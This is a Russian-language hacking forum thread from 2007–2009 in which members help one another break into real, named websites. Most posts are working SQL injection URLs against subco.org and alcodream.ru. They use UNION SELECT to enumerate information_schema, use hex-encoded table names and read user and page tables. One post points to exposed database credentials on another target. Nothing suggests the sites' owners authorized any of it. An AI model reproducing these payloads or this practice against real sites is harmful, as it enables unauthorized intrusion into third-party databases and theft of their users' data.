Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    370
    Likes Received:
    92
    Reputations:
    5
    какие атаки можно провести черех хедер запроса ? если его поля нефильтруються ?
     
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Все те же, что и GET, POST методом.
    Всё зависит от кода.
     
  3. cr0w

    cr0w Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    92
    Likes Received:
    141
    Reputations:
    33
    mailbrush

    Там, в index.cgi, есть инфа для коннекта к БД, причем возможно удаленно приконнектиться. Попробуй это проработать + поискать админку.
     
    2 people like this.
  4. crawen_s

    crawen_s New Member

    Joined:
    19 Jul 2009
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Привет. Вот такой запрос выполняется:

    А так, почему то ошибка, наверно что-то фильтруется:

     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    А тогда в 101 раз скажу - для начала вот так:
    Code:
    http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,table_schema,10,11,12,13+from+information_schema.columns+where+table_name=0x64756277696b695f75736572/*
    
    допустим выдаст нечто вроде subco_db

    потом так:

    Code:
    http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,name,10,11,12,13+from+subco_db.dubwiki_user/*
    
     
  6. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    В той таблице нету записей

    http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,(select+count(*)+from+dubwiki_user),13+from+information_schema.tables--+
     
  7. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    crawen_s
    http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,column_name,11,12,13+from+information_schema.columns+where+table_name=0x64756277696B695F75736572+limit+1,7/*

    А вообще:
    Может быть другая DB. Как проверять написал Pashkela
    В данной таблице нету записей
    ...WHERE TABLE_NAME=<hex>
     
    #8467 Tigger, 18 Aug 2009
    Last edited: 18 Aug 2009
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ...

    ))) не в то поле смотрел:))) Пора баиньки

    Вообще бред какой-то:

    Code:
    http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,count(*),11,12,13+from+dubwiki_user--+
    
    вот так должен выводить ноль, если записей нет, ошибки нет, но просто пусто, великолепно. Хз чо такое

    А вот с этой таблы выводит:

    Code:
    http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,count(*),11,12,13+from+dubwiki_version--+
    
    и показывает кол-во 7. У меня вывод только один - покрашенная табла в БД, а именно dubwiki_user, т.е. сломанная, нарушенны какие-то связи и т.д. Других вариантов не вижу чото.

    Старшие придут, может чо поумнее скажут

    PS: Ну да, остальные dubwiki в той же БД:

    Code:
    http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,table_schema,11,12,13+from+information_schema.columns+where+table_name=0x64756277696b695f70616765--+
    
    но из них инфо спокойно читается, на тоже как-то странно:))

    Code:
    http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,concat_ws(id,name,currentversion),11,12,13+from+dubwiki_page+limit+1,1--+
    
    какой-то мегохоцер БД строил:)
     
    #8468 Pashkela, 18 Aug 2009
    Last edited: 18 Aug 2009
    2 people like this.
  9. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    а вы как бы не предполагали что вы не туда выводите результат запроса? Просто в коде для 10-ого поля стоит проверка, если 0 то ничего не выводится вообще. А если выводить например в 12-ое поле то отлично видно что в той табличке просто ничего нет
    Code:
    http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,count(*),13+from+dubwiki_user--+
     
    3 people like this.
  10. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    ^
    ||
    Вот именно
    Code:
    http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,0x30,11,12,13+--+
    какие тут связи нарушены могут быть? нейронные? во что покрашена табла? в какой цвет? и собственно какая табла? в последнем примере ничего странного не обнаружил, мож ты просто в concat_ws разделитель забыл поставить?
     
    3 people like this.
  11. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.alcodream.ru/categoryID/80+UNION+SELECT%20group_concat(table_name)%20from%20information_schema.tables%20--

    Как вот сдесь сделать вывод просто если 80 заменить на 80-80 или там на 2923939 или "-" подставить скиыдывает на индекс.пхп
     
  12. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,573
    Likes Received:
    976
    Reputations:
    783
    Какой то мегохоцер не умеет юзать concat_ws
     
  13. 6@llT0

    6@llT0 New Member

    Joined:
    29 Apr 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Наибанальнейший вопрос:

    Допустим у меня есть сканер уязвимостей, он находит N колличество уязвимостей, а как мне их испольховать?

    Если уже где-то это было прошу скинуть ссылку на этот топик.
     
    1 person likes this.
  14. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    concat_ws(0x3a,column,column) мегохоцер :(
     
  15. crawen_s

    crawen_s New Member

    Joined:
    19 Jul 2009
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    6@llT0
    Копируеш тип уязвимости и в гугл искать сплоит или хотяби тему на форуме www.sevuritylab.ru, www.securityfocus.com, etc.
     
  16. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    каких именно уязвимостей :eek: их не две штуки что бы экстросенсорно догадаться
     
  17. crawen_s

    crawen_s New Member

    Joined:
    19 Jul 2009
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Ребят, так таблица dubwiki_user не доступна или как ????
     
  18. 6@llT0

    6@llT0 New Member

    Joined:
    29 Apr 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Ну он ещё не досканировал...
    А вообше я в этом нуб, нубом вот и пытаюсь хоть как-то разобраться=)
     
  19. 6@llT0

    6@llT0 New Member

    Joined:
    29 Apr 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    И подскажите какой нибудь хорший скан=)
     
  20. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    мозги и голова, хороший сканер :confused:
    и пытайся разобраться с разделов "Статьи" и "Избранное".
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.